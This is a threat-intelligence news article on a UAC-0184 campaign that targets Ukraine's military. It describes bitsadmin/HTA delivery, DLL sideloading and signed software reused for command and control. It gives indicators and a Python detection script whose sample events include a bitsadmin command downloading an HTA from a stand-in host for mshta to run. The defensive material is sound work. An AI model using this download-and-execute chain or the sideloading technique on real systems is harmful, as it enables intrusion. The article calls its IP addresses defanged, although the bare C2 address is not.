UAC-0184 Malware Chain Uses bitsadmin and HTA Files for Gated Payload Delivery

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer


A newly documented attack chain linked to the threat group UAC-0184 has been observed using Windows’ built-in bitsadmin tool and HTA files to sneak malicious payloads onto targeted systems.

The campaign is primarily aimed at Ukraine, with clear indicators pointing toward military-related targets, including individuals connected to the Ukrainian Defence Forces.

The level of craft and patience displayed across every stage of this infection chain sets it apart from noisier, less disciplined campaigns that have surfaced recently.

The attackers use social engineering lures built around topics like criminal proceedings, combat videos, and personal contact requests to trick victims into opening malicious files.

Once a victim opens the booby-trapped document, whether it appears as a PDF, a Word file, or an Excel spreadsheet, bitsadmin quietly fetches an HTA file from an attacker-controlled remote server in the background.

That HTA file is then executed using mshta.exe, pushing the infection forward without raising any immediate alarms on the compromised machine.

Analysts at Synaptic Security said in a report shared with Cyber Security News (CSN) that the delivery mechanism appears to be gated: the payload is served only to systems that pass certain filtering criteria, which likely screens out sandboxes and security researchers' environments.

An operation (Source – Synaptic Security)

This kind of conditional delivery makes the malware significantly harder to study and allows the attackers to remain active without drawing unwanted attention for extended stretches of time.

The HTA file, once executed, runs a hidden PowerShell command that downloads a ZIP archive named dctrprraclus.zip from the attacker-controlled server at IP address 169.40.135.35.

UAC-0184 Malware Chain

The archive unpacks into a folder inside the AppData directory and launches two files side by side: a music visualizer application called Cluster-Overlay64.exe and a decoy PDF named Scan_001.pdf.

The PDF is shown to the victim as a distraction while the real infection continues quietly and undetected in the background on their machine.

The broader toolset that UAC-0184 deploys reveals considerable operational sophistication. The final stage of the infection chain involves PassMark BurnInTest network components being repurposed as a covert command-and-control channel, listening on UDP port 31339 for multicast peer discovery traffic.

This abuse of a legitimate, Microsoft-signed software stack gives the attacker a convincing cover identity deep inside a trusted process tree.

The use of bitsadmin for downloading files is not new, but pairing it with HTA file execution is a deliberate technique that helps the attacker blend in with normal Windows background activity.

kernel-diag.lib appears only in openvr_api.dll (Source – Synaptic Security)

Bitsadmin is a native Windows command-line tool originally built for background file transfers, and its abuse by threat actors often goes unnoticed by both everyday users and many endpoint security products.

Once the HTA file executes, it drops a layered package containing Cluster-Overlay64.exe, openvr_api.dll, filter.bin, and kernel-diag.lib inside the ApplicationData32 folder. The actual malicious code does not sit inside the main executable.

Instead, it is buried inside DLL files and encoded local blobs, decrypted at runtime through a multi-stage process combining XOR operations with LZNT1 decompression.

The final payload is then side-loaded into VSLauncher.exe, a legitimate Microsoft-signed Visual Studio binary that wraps it in a trustworthy digital identity.

Signed Software Repurposed as a Cover Identity

One of the most striking aspects of this campaign is how aggressively the threat actor leans on legitimate, signed software to mask malicious behavior from defenders.

PassMark Endpoint, a genuine commercial network testing utility, becomes the final network-facing component, carrying capabilities including process memory dumping via MiniDumpWriteDump and peer data transfer over TCP port 31339.

Plane9Engine.dll loads openvr_api.dll (Source – Synaptic Security)

Defenders are advised to monitor for bitsadmin and mshta.exe being used together, especially when paired with suspicious temporary file name patterns like ~tmp(…).hta.

Network teams should watch for UDP traffic toward 224.0.0.255 on port 31339, which is the PassMark multicast discovery address that this campaign repurposes for its own communication.

The presence of VSLauncher.exe running outside a legitimate Visual Studio installation path, or any unexpected file creation events inside %APPDATA%\ApplicationData32, should be treated as serious warning signs that warrant immediate investigation by security teams.
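As an added illustration of the hunting guidance above (example code written for this article, not taken from the Synaptic Security report or any vendor tooling), the following Python runs those checks over a handful of constructed Sysmon-style events; the event field names and the expected Visual Studio install directory for VSLauncher.exe are assumptions.

```python
import re

# Constructed sample telemetry (not from the report), loosely modelled on Sysmon
# process-create, file-create and network-connect events.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 4100, "ppid": 3000, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer j /download http://example.invalid/a.hta C:\Users\u\AppData\Local\Temp\~tmp(4).hta"},
    {"type": "process", "pid": 4120, "ppid": 3000, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\u\AppData\Local\Temp\~tmp(4).hta"},
    {"type": "file", "pid": 4130, "path": r"C:\Users\u\AppData\Roaming\ApplicationData32\openvr_api.dll"},
    {"type": "process", "pid": 4140, "ppid": 4130, "image": r"C:\Windows\SysWOW64\VSLauncher.exe",
     "cmdline": "VSLauncher.exe"},
    {"type": "network", "pid": 4140, "proto": "udp", "dst_ip": "224.0.0.255", "dst_port": 31339},
    {"type": "process", "pid": 5000, "ppid": 3000, "cmdline": "VSLauncher.exe app.sln",
     "image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\MSEnv\VSLauncher.exe"},
]

# Assumed legitimate home of VSLauncher.exe (typical Visual Studio layout, not stated in the report).
VSLAUNCHER_OK_DIR = r"c:\program files (x86)\common files\microsoft shared\msenv"
TMP_HTA = re.compile(r"~tmp\([^)]*\)\.hta", re.IGNORECASE)  # report gives the pattern as ~tmp(...).hta
C2_MCAST, C2_PORT = "224.0.0.255", 31339  # PassMark multicast discovery address and port from the report

def image_name(ev):
    return ev.get("image", "").rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule_name, pid) tuples for events matching the article's hunting guidance."""
    alerts = []
    parents_with_bitsadmin = {e["ppid"] for e in events if e["type"] == "process" and image_name(e) == "bitsadmin.exe"}
    for e in events:
        if e["type"] == "process":
            name = image_name(e)
            # bitsadmin and mshta.exe launched by the same parent (e.g. the Office process that opened the lure)
            if name == "mshta.exe" and e["ppid"] in parents_with_bitsadmin:
                alerts.append(("bitsadmin_then_mshta_same_parent", e["pid"]))
            # mshta.exe run against a ~tmp(...).hta file in %TEMP%
            if name == "mshta.exe" and TMP_HTA.search(e.get("cmdline", "")):
                alerts.append(("mshta_tmp_hta", e["pid"]))
            # VSLauncher.exe running outside its expected Visual Studio directory
            if name == "vslauncher.exe" and not e["image"].lower().startswith(VSLAUNCHER_OK_DIR):
                alerts.append(("vslauncher_outside_vs_path", e["pid"]))
        elif e["type"] == "file" and "\\appdata\\roaming\\applicationdata32\\" in e["path"].lower():
            alerts.append(("file_create_applicationdata32", e["pid"]))
        elif e["type"] == "network" and e["dst_port"] == C2_PORT and (e["proto"] == "tcp" or e["dst_ip"] == C2_MCAST):
            alerts.append(("burnintest_port_31339", e["pid"]))
    return alerts

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"ALERT {rule} pid={pid}")
```

The legitimate VSLauncher.exe launch (pid 5000) produces no alert, so the path check alone does not fire on a normal Visual Studio installation.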

Indicators of Compromise (IoCs):

Type | Indicator | Description
IP Address | 169.40.135.35 | Attacker-controlled C2 server hosting HTA files and payload archive
URL | hxxp://169.40.135.35/dctrpr/slippersuppity.hta | HTA stage-1 payload URL (PDF lure variant)
URL | hxxp://169.40.135.35/dctrpr/basketpast.hta | HTA stage-1 payload URL (Word document lure variant)
URL | hxxp://169.40.135.35/dctrpr/agentdiesel.hta | HTA stage-1 payload URL (Excel lure variant)
URL | hxxp://169.40.135.35/dctrprraclus.zip | Payload ZIP archive download URL
SHA-256 | 81d93004a02a455af01b0f709e34d5134108ec350f9391dc0f91a00a54998590 | ZIP archive (dctrprraclus.zip)
SHA-256 | dc6cddc391b373b18f105f49a80ff83d53b430d8dea35c1f1576832fa9fbd2b3 | kernel-diag.lib (encoded payload loader)
SHA-256 | f5ca9c53d1537142889d7172c6643e886b2164233b91f0fc2d41ca010f035372 | filter.bin (XOR-encrypted secondary payload)
SHA-256 | df6942dc1a89226359adf1aac597c3b270f4a408214b4f7c2083f9524605e0f7 | openvr_api.dll (DLL sideload component)
SHA-256 | b811f28b844eff8c1f4f931639bed5bcc41113364fdfc44d7703259457839edb | input.dll (PassMark Endpoint sideloaded payload)
SHA-256 | 33e44dea247eaa8b0fc8ed1f8ed575905f6ce0b7119337ddd29863bbb03288b3 | PE_08 / SqlExpressChk.exe (bundled PE component)
File Path | %APPDATA%\ApplicationData32\Cluster-Overlay64.exe | Dropped music visualizer used as sideload host
File Path | %APPDATA%\ApplicationData32\openvr_api.dll | Dropped DLL containing loader logic
File Path | %APPDATA%\ApplicationData32\filter.bin | Dropped XOR-encrypted payload blob
File Path | %APPDATA%\ApplicationData32\kernel-diag.lib | Dropped DWORD-XOR encoded loader blob
File Path | %windir%\SysWOW64\input.dll | PassMark Endpoint DLL dropped for sideloading
File Path | %windir%\SysWOW64\VSLauncher.exe | Microsoft-signed sideload host (Visual Studio Version Selector)
Network | 224.0.0.255:31339 (UDP) | PassMark BurnInTest multicast discovery, repurposed for C2 peer discovery
Network | 31339/tcp | BurnInTest peer data channel, repurposed for C2 data transfer
File Name Pattern | ~tmp(…).hta | Temporary HTA file pattern written to %TEMP% during initial execution

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
